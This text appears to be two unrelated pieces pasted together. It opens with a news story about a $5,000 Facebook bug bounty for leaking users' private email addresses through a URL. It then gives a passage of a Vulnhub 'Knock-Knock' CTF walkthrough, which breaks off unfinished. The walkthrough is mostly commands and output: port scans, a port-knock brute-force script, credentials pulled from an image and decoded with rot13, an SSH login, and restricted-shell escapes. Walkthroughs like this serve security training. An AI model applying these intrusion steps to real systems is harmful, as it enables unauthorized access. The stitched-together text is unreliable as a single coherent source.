CLEVER FACEBOOK HACK REVEALS PRIVATE EMAIL ADDRESS OF ANY USER

Christmas came early for Facebook bug bounty hunter Tommy DeVoss who was paid $5,000 this week for discovering a security vulnerability that allowed him to view the private email addresses of any Facebook user.

“The hack allowed me to harvest as many email addresses as I wanted from anybody on Facebook,” DeVoss said. “It didn’t matter how private you thought your email address was – I could of grabbed it.”

The bug was tied to the user-generated Facebook Groups feature that allows any member to create an affinity group on the social network’s platform. DeVoss discovered as an administrator of a Facebook Group he could invite any Facebook member to have Admin Roles via Facebook’s system to do things such as edit post or add new members.DeVoss said on Thanksgiving Day he discovered the vulnerability and reported it to Facebook via itsbug bounty program. After weeks of going back and forth verifying what the exact bug was and how it was exploited, Facebook said it would award him $5,000 for the discovery. And on Tuesday it did.

Those invitations were handled by Facebook and sent to the invited recipient’s Facebook Messages inbox, but also to the Facebook user’s email address associated with their account. In many cases users choose to keep their email addresses private. DeVoss discovered, despite privacy settings set by Facebook members, he was able to gain access to any Facebook user’s email address whether he was Friends with them or not.

DeVoss found when he cancelled pending invitations to those invited to be Facebook Group Administrators there was a glitch. “While Facebook waits for the confirmation, the user is forwarded to a Page Roles tab that includes a button to cancel the request,” he said.

Next, he switched to Facebook’s mobile view of the Page Roles tab. Here DeVoss was able to view the full email addresses of anyone he wanted to cancel from becoming a Facebook Group Administrator.

“I noticed that when you clicked to cancel the administrator invitation on the mobile page, you were redirected to a page with the email address in the URL,” he said. “Now all you have to do is pluck the plaintext version of the confidential email address straight from the URL.”

The impact of this vulnerability could be diverse, he wrote in a blog post outlining his discovery. “Harvesting email addresses this way contradicts Facebook’s privacy policy and could lead to targeted phishing attempts or other malicious purposes.”

Facebook confirmed the hack and said it has no evidence the vulnerability was ever misused. Facebook said it has implemented a fix to prevent the issue from being exploited.

DeVoss, a software developer in Virginia, said this is the largest bug bounty payment he has ever earned. He told Threatpost he participates in a number of bug bounty programs including Yahoo’s and the Hack the Pentagon program.

For its part, in October Facebook announced it has paid out more than $5 million to 900 researchers in the five years since it implemented its bug bounty program. The company said it paid out $611,741 to 149 researchers in the first half of 2016 alone.

Facebook was one of the first websites to launch a bug program when it followed in the footsteps of both Mozilla and Google in August 2011. In February, the company paid $10,000 to a 10-year-old boy from Finland after he discovered an API bug in the image sharing app Instagram, which Facebook bought for $1B in 2012. The company awarded $15,000 to Anand Prakash in March for a bug allowed him to crack open any of Facebook’s 1.1 billion accounts using a rudimentary brute force password attack.

Knock-Knock writeup

On the website of Vulnhub we can find many virtual machines prepared to exploit known bugs and use different tricks to penetrate systems and find security breaches. Today I'm posting my answer key for one of the machines that I have liked so far: Knock-Knock: 1.1

Description

Let's go!

First we identify the ip that has been assigned to the virtual machine and perform a routine scan

netdiscover

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

root @ kali : ~ # netdiscover -i eth0 Currently scanning : 192.168.29.0 / 16    |    Screen View : Unique Hosts 14 Captured ARP Req / Rep packets , from 8 hosts .    Total size : 840 _____________________________________________________________________________    IP             At MAC Address       Count   Len   MAC Vendor -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 192.168.1.113    08 : 00 : 27 : be : dd : c8      01      060    CADMUS COMPUTER SYSTEMS root @ kali : ~ # nmap -sS -sV -PN 192.168.1.113 Starting Nmap 7.00 ( https : //nmap.org ) at 2015-12-27 09:04 EST Nmap scan report for 192.168.1.113 Host is up ( 0.00042s latency ) . All 1000 scanned ports on 192.168.1.113 are filtered MAC Address : 08 : 00 : 27 : BE : DD : C8 ( Oracle VirtualBox virtual NIC ) Service detection performed . Please report any incorrect results at https : //nmap.org/submit/ . Nmap done : 1 IP address ( 1 host up ) scanned in 5.74 seconds

It seems that we do not get any results, but it gave us a clue in describing DHCP is not broken and the name of the virtual machine, I guess that we have to play with ports. The first thing I think about is "portknocking"and I start Googling to refresh your memory.

• Port Knocking

Https://wiki.archlinux.org/index.php/Port_Knocking_(Spa%C3%B1ol)

• How to Use Port Knocking to Hide your SSH Daemon from Attackers

Https://www.digitalocean.com/community/tutorials/how-to-use-port-knocking-to-hide-your-ssh-daemon-from-attackers-on-ubuntu

After a quick reading, let's do a deeper scan, this time hitting

1 2 3 4 5 6 7

root @ kali : ~ # for i in {1..65535};do nmap -PN --host_timeout 201 --max-retries 0  -p $i 192.168.1.113;done|grep open 260 / tcp filtered openport 557 / tcp filtered openvms - sysipc 1194 / tcp filtered openvpn 1259 / tcp filtered opennl - voice 1337 / tcp open   waste 1473 / tcp filtered openmath

Perfect! We have opened the 1337, we will investigate it a little

1 2 3 4 5 6 7 8 9 10 11

root @ kali : ~ # nc -vv 192.168.1.113 1337 192.168.1.113 : inverse host lookup failed : Unknown host ( UNKNOWN ) [ 192.168.1.113 ] 1337 ( ? ) open [ 24680 , 23810 , 58745 ] sent 0 , rcvd 22 root @ kali : ~ # telnet 192.168.1.113 1337 Trying 192.168.1.113... Connected to 192.168.1.113. Escape character is '^]' . [ 30825 , 34256 , 14349 ] Connection closed by foreign host .

It gives us little information, no banner, but I find it curious to see 3 ports at the exit. I'm going to hit them! In the article port knocking in Spanish read: Port knocking (Touching ports) is a discrete method of open ports, by default, the firewall remains closed. It works by requiring connection attempts to a series of closed pre-defined ports. When the correct sequence of "ports" (connection attempts) is received, the firewall then opens certain port (s). So I imagine that if we hit those three ports in the correct order other ports will open to our ip and in theory we will see them with nmap. First we try in the same order they appear after closing telnet

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

root @ kali : ~ # nmap -PN --host_timeout 201 --max-retries 0  -p 30825,34256,14349 192.168.1.113 Starting Nmap 7.00 ( https : //nmap.org ) at 2015-12-27 09:58 EST Nmap scan report for 192.168.1.113 Host is up ( 0.00057s latency ) . PORT       STATE     SERVICE 14349 / tcp filtered unknown 30825 / tcp filtered unknown 34256 / tcp filtered unknown MAC Address : 08 : 00 : 27 : BE : DD : C8 ( Oracle VirtualBox virtual NIC ) Nmap done : 1 IP address ( 1 host up ) scanned in 0.10 seconds root @ kali : ~ # nmap -F 192.168.1.113 Starting Nmap 7.00 ( https : //nmap.org ) at 2015-12-27 09:58 EST Nmap scan report for 192.168.1.113 Host is up ( 0.00029s latency ) . All 100 scanned ports on 192.168.1.113 are filtered MAC Address : 08 : 00 : 27 : BE : DD : C8 ( Oracle VirtualBox virtual NIC ) Nmap done : 1 IP address ( 1 host up ) scanned in 2.33 seconds

Ouch! There has been no luck. We will have to create a script that tests all possible combinations of strikes to those three ports and we do "brute force". We will use the same thing as before: telnet and nmap

tok-tok.sh

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

#!/bin/bash #LoRKa pax0r script for knock-knock vm (vulnhub.com) host = 192.168.1.113 puertos = ` telnet $ host 1337 | grep "," | sed 's/,/ /' | sed 's/,/ /' | sed 's/\[/ /' | sed 's/\]/ /' ` file = lista . txt rm - rf $ file for c1 in $ puertos do      for c2 in $ puertos      do          if [ "$c1" != "$c2" ] ; then              for c3 in $ puertos              do                  if [ "$c1" != "$c3" ] ; then                      [ $ c1 - ne $ c2 - a $ c1 - ne $ c3 - a $ c2 - ne $ c3 ] && echo $ c1 >> $ file && echo $ c2 >> $ file && echo $ c3 >> $ file                  fi              done          fi      done done for i in ` cat $ file ` ; do nmap - PN -- host _ timeout 201 -- max - retries 0    - p $ i $ host ; done 2 > & 1 nmap - F $ host

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

root @ kali : ~ # ./tok-tok.sh Connection closed by foreign host . Starting Nmap 7.00 ( https : //nmap.org ) at 2015-12-27 10:09 EST Nmap scan report for 192.168.1.113 Host is up ( 0.00026s latency ) . PORT       STATE     SERVICE 34916 / tcp filtered unknown MAC Address : 08 : 00 : 27 : BE : DD : C8 ( Oracle VirtualBox virtual NIC ) Nmap done : 1 IP address ( 1 host up ) scanned in 0.14 seconds Starting Nmap 7.00 ( https : //nmap.org ) at 2015-12-27 10:09 EST Nmap scan report for 192.168.1.113 Host is up ( 0.00072s latency ) . PORT       STATE     SERVICE 58747 / tcp filtered unknown MAC Address : 08 : 00 : 27 : BE : DD : C8 ( Oracle VirtualBox virtual NIC ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Starting Nmap 7.00 ( https : //nmap.org ) at 2015-12-27 10:09 EST Nmap scan report for 192.168.1.113 Host is up ( 0.00069s latency ) . Not shown : 98 filtered ports PORT   STATE SERVICE 22 / tcp open   ssh 80 / tcp open   http MAC Address : 08 : 00 : 27 : BE : DD : C8 ( Oracle VirtualBox virtual NIC ) Nmap done : 1 IP address ( 1 host up ) scanned in 2.23 seconds root @ kali : ~ #

Eureka !! Now the firewall teaches us the ports open to our local ip address, we will see that there is there .. 
On the web we see

After looking at the code and not find anything, did a scan to possible hidden directories and files wfuzz , also spent nikto and got no results in any case. This led me to think that there might have been a bug in ssh, I looked at the version that returned the banner and I railed for a while with that too, I tried brute force with easy ssh dictionaries and I did not get anything either.

1 2 3 4 5 6 7 8

root @ kali : ~ # nc -vv 192.168.1.113 22 192.168.1.113 : inverse host lookup failed : Unknown host ( UNKNOWN ) [ 192.168.1.113 ] 22 ( ssh ) open SSH - 2.0 - OpenSSH_6 . 0p1 Debian - 4 + deb7u2 Protocol mismatch . sent 1 , rcvd 58 root @ kali : ~ #

Then I realized that the only thing I had not seen in depth was the image that appeared in the index, downloaded it and ...

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

root @ kali : ~ # strings knockknock.jpg JFIF Ducky http : //ns.adobe.com/xap/1.0/ <? xpacket begin = " " id = "W5M0MpCehiHzreSzNTczkc9d" ?> < x : xmpmeta xmlns : x = "adobe:ns:meta/" x : xmptk = "Adobe XMP Core 4.1-c036 46.276720, Mon Feb 19 2007 22:13:43        " > < rdf : RDF xmlns : rdf = "http://www.w3.org/1999/02/22-rdf-syntax-ns#" >    < rdf : Description rdf : about = ""    . . . . . . . . . . . . . . . . .    . . . . . . . . . . . . . . . . . . . . . .    . . . . . . . . . . . . . . . . . . . . . . . . . . . . .    . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \ Uv* * M1W tR ) O MO : / ? qW | U \ + \ U Login Credentials abfnW sax2Cw9Ow root @ kali : ~ #

These "Login Credentials" should be the other service we have active, ssh. After testing user: abfnW and password: sax2Cw9Ow (and vice versa), only got "incorrect password". Then I thought they were encrypted somehow. Since it was not base64 md5 or I went directly to google and put "simple ciphers" and the first article that appears , wikipedia, it gives us the answer. Encryption is our rot13 and we will help a small program in c to decipher.

rot13.c

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

#include #include int main ( int argc , char * * argv ) {      int ch = '\0' ;      while ( ( ch = fgetc ( stdin ) ) != EOF )      {        /* for every char in stdin */        unsigned char c = ( unsigned char ) ch ;        if ( ( c >= 'a' && c <= 'z' ) || ( c >= 'A' && c <= 'Z' ) ) { /* if letter */ unsigned char abs ; if ( c >= 'a' && c <= 'z' ) /* for every small letter */ abs = c - 'a' ; else if ( c >= 'A' && c <= 'Z' ) /* for every big letter */ abs = c - 'A' ; abs = abs + 13 ; /* dot rot13 */ if ( abs >= 26 )    abs -= 26 ; /* wrap */ if ( c >= 'a' && c <= 'z' ) /* for every small letter */ c = abs + 'a' ; else if ( c >= 'A' && c <= 'Z' ) /* for every big letter */    c = abs + 'A' ;        } ;        printf ( "%c" , c ) ;      }      return 0 ; }

We copy the two words to a txt ... and ...

1 2 3 4 5 6 7

root @ kali : ~ # cat password abfnW sax2Cw9Ow root @ kali : ~ # cat password |./rot13 nosaJ fnk2Pj9Bj root @ kali : ~ #

After testing them with no result, again I look at "nosaJ", hmmm "Jason"? I'm going to copy the password file to the chain again and I'm going to go through the rot13 again ..

1 2 3 4 5 6 7 8 9 10 11 12 13

root @ kali : ~ # cat pass abfnW sax2Cw9Ow Wnfba wO9wC2xas root @ kali : ~ # cat pass|./rot13 nosaJ fnk2Pj9Bj Jason jB9jP2knf root @ kali : ~ #

After a couple of tries (user Jason is lowercase and I still do not know why ..) I get into the machine. I do an ls and I see a file with setuid root but ..

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

root @ kali : ~ # ssh -l jason 192.168.1.113 jason @ 192.168.1.113 's password: Linux knockknock 3.2.0-4-486 #1 Debian 3.2.60-1+deb7u3 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have new mail. Last login: Wed Jan  6 11:57:50 2016 from 192.168.1.106 [email protected] :~$ ls -alt total 32 drwxr-xr-x 2 jason jason 4096 Oct 11  2014 . -rw------- 1 jason jason 2396 Oct 11  2014 .viminfo -rwsr-xr-x 1 root  jason 7457 Oct 11  2014 tfc lrwxrwxrwx 1 jason jason    9 Sep 26  2014 .bash_history -> /dev/null -rw-r--r-- 1 jason jason 3398 Sep 25  2014 .bashrc -rw-r--r-- 1 jason jason  675 Sep 24  2014 .profile drwxr-xr-x 3 root  root  4096 Sep 24  2014 .. -rw-r--r-- 1 jason jason  220 Sep 24  2014 .bash_logout [email protected] :~$ ./tfc -rbash: ./tfc: restricted: cannot specify `/' in command names jason @ knockknock : ~ $

Oh wait A "restricted bash" !! , The oldschool them to sound these techniques of old wargames and not bad review them , so we look at https://en.wikipedia.org/wiki/Restricted_shell and our beloved wikipedia returns to give us the solution

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

jason @ knockknock : ~ $ vi : set shell = / bin / sh : shell $ id uid = 1000 ( jason ) gid = 1000 ( jason ) groups = 1000 ( jason ) , 24 ( cdrom ) , 25 ( floppy ) , 29 ( audio ) , 30 ( dip ) , 44 ( video ) , 46 ( plugdev ) $ . / tfc ______________________________ _ \ __     ___ / \ _    _____ / \ _    __ _ \    |      |      |      __ )    /      \    \ /    |      |      |      \    \      \ ____    | ____ |      \ ___    /      \ ______    /                  \ /              \ / Tiny File Crypter - 1.0 Usage : . / tfc < filein . tfc > < fileout . tfc > $

Later I discovered a cooler way to escape, which I did not know and learned thanks to this challenge

1 2 3 4 5 6 7 8 9 10 11 12 13 14

jason @ knockknock : ~ $ ftp ftp > ! jason @ knockknock : ~ $ . / tfc ______________________________ _ \ __     ___ / \ _    _____ / \ _    __ _ \    |      |      |      __ )    /      \    \ /    |      |      |      \    \      \ ____    | ____ |      \ ___    /      \ ______    /                  \ /              \ / Tiny File Crypter - 1.0 Usage : . / tfc < filein . tfc > < fileout . tfc > jason @ knockknock : ~ $

Well, come to this point and after reviewing the machine in general without finding any strange file or binary with setuid, we are clear that our challenge is already focused on the binary "tfc", created by c0ne and to which They give you thanks in the initial description.

To be continue…